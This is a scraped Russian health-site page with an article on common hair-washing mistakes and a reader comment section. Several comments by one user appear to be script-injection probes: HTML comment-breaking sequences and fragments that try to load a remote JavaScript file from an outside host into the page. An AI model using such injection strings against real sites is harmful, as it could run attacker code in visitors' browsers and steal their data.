Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вы неправильно моете голо...  >>  Вы неправильно моете голову! Как надо?
 
Обратная связь
 

Вы неправильно моете голову! Как надо?

Размер шрифта
10 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Тусклые волосы, секущиеся кончики и перхоть? Не спешите винить погоду. Все эти проблемы могут быть вызваны неправильным мытьем головы. В чем же заключаются ваши ошибки?

Мало воды

Для того чтобы средства для волос подействовали наиболее эффективно, все волосы должны быть очень мокрыми. Не стоит экономить воду! Перед тем, как наносить шампунь, постойте под душем 3-4 минуты, чтобы даже на выбившиеся мелкие пряди попала вода.

Неправильные сульфаты

Сульфаты необходимы для появления большого количества пены и легкого намыливания, без чего невозможно качественное удаления грязи, омертвевших клеток и кожного секрета. При мытье головы нанесите шампунь на заднюю часть шеи, макушку и оба виска, а затем добавьте воды до появления мыльной пены.

Вы растираете волосы

Одна из наиболее распространенных ошибок заключается в усиленном трении волос, например, между ладоней. Это может привести к значительному повреждению волос. Старайтесь без необходимости не трогать концы волос. Лучше массируйте подушечками пальцев кожу головы, где шампунь необходим больше всего.

Ненужные повторения

Популярная ошибка – нанесение шампуня два или даже более раз. Миф о том, что волосы надо мыть шампунем два раза подряд исходит из 50-х голов, когда было принято мыть голову раз в неделю и реже. Однократного нанесения шампуня при мытье волос вполне достаточно.

Вы плохо промываете волосы

После нанесения шампуня необходимо время, чтобы тщательно его смыть. Вы удивитесь, но парикмахеры нередко замечают белесоватые следы за ушами, на шее и на волосистой части головы. Это не что иное, как остатки шампуня, которые могут напоминать перхоть. Не повторяйте этих ошибок.

Вы наносите кондиционер не туда

Мытье головы не считается завершенными без использования кондиционера. Помните, что кондиционер наносят на свободные концы, а не на корни волос. Старайтесь не использовать расческу, чтобы распределить кондиционер – она рвет мокрые волосы. И в заключение не забудьте прополоскать шевелюру холодной водой для дополнительного блеска.

Еще больше об уходе за волосами, кожей и не только вы можете прочитать в нашем спецпроекте «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - VonterBlack

17 июня 2015 в 03:53

Цитировать   |   Пожаловаться

Даже голову мыть надо как-то по особому )) жуть ))

2 - zzzzzz

30 июня 2015 в 17:42

Цитировать   |   Пожаловаться

цукенрголд

3 - zzzzzz

30 июня 2015 в 17:43

Цитировать   |   Пожаловаться

-->qwe
-->
--!>

-- >
-- !> dfgh

4 - zzzzzz

30 июня 2015 в 17:44

Цитировать   |   Пожаловаться

dfghj--> -- > --> --!>fgvhg

5 - zzzzzz

30 июня 2015 в 17:46

Цитировать   |   Пожаловаться

rtyguhjkl

6 - zzzzzz

30 июня 2015 в 17:47

Цитировать   |   Пожаловаться

rtyguhjkl --> --!> > --> --> ddd

7 - zzzzzz

30 июня 2015 в 17:55

Цитировать   |   Пожаловаться

--> src="qqq.js">

8 - zzzzzz

30 июня 2015 в 17:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

9 - zzzzzz

30 июня 2015 в 18:01

Цитировать   |   Пожаловаться

1234567

10 - zzzzzz

30 июня 2015 в 18:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

1 | 2 | 3 Следующая

Статьи

       
Вся правда о шампунях и кондиционерах   Как купить хороший подарок на Новый год   Как наносить духи   Какой длины должны быть ваши ресницы?  
03 декабря 2012Лекарство от глаукомы помогает при облысении 25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины
 
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Как справиться с волосами летом?
Как сэкономить и покрасить волосы дома?
Как покрасить волосы? И как с ними жить?

Тесты

Как устроены волосы человека?
Заболеет ли ваша семья?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.